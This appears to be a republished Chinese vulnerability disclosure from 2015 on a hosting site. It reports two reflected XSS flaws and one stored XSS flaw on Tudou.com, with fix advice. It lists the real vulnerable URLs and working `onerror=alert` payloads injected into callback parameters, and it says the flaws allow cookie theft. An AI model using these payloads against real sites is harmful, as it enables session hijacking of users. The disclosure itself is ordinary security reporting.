鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

土豆网三枚XSS(均可获取cookie)

来源:互联网 作者:佚名 时间:2015-06-30 08:21
土豆网某些页面由于没有进行过滤或过滤不严导致存在的两枚反射型和一枚存储型XSS跨站漏洞 存在反射型XSS的两个地址 1、 http://login.tudou.com/reg.do?act=isRegisteredNickname4Regcallback=wooyun2、 http://tjpt.my.tudou.com/tjpt/recommend?pcode=10000
土豆网某些页面由于没有进行过滤或过滤不严导致存在的两枚反射型和一枚存储型XSS跨站漏洞

存在反射型XSS的两个地址
 
1、
http://login.tudou.com/reg.do?act=isRegisteredNickname4Reg&callback=wooyun2、
http://tjpt.my.tudou.com/tjpt/recommend?pcode=10000100&callback=wooyun
 
存在存储型XSS的一个地址(这个我看已经有人发布了,但目前为止仍未修复)
 
3、
http://marketing.tudou.com/tianlei/shumenol2/upload.php
 
 
http://tjpt.my.tudou.com/tjpt/recommend?pcode=10000100&callback=wooyun%3CIMG%20SRC=1%20onerror=alert%28/XSS/%29%3E
 
http://login.tudou.com/reg.do?act=isRegisteredNickname4Reg&callback=wooyun%3CIMG%20SRC=1%20onerror=alert%28/XSS/%29%3E
 
http://marketing.tudou.com/tianlei/shumenol2/upload.php
没有对用户输入进行数据合法性验证,导致了持久性XSS
http://marketing.tudou.com/tianlei/shumenol2/view.php?id=1845349
//firefox弹窗效果
 


//chrome弹窗效果 
 
修复方案:

1、过滤不可信数据
 
2、对用户输入进行数据合法性验证
 
3、为Cookie加上HttpOnly 
 
网友评论
<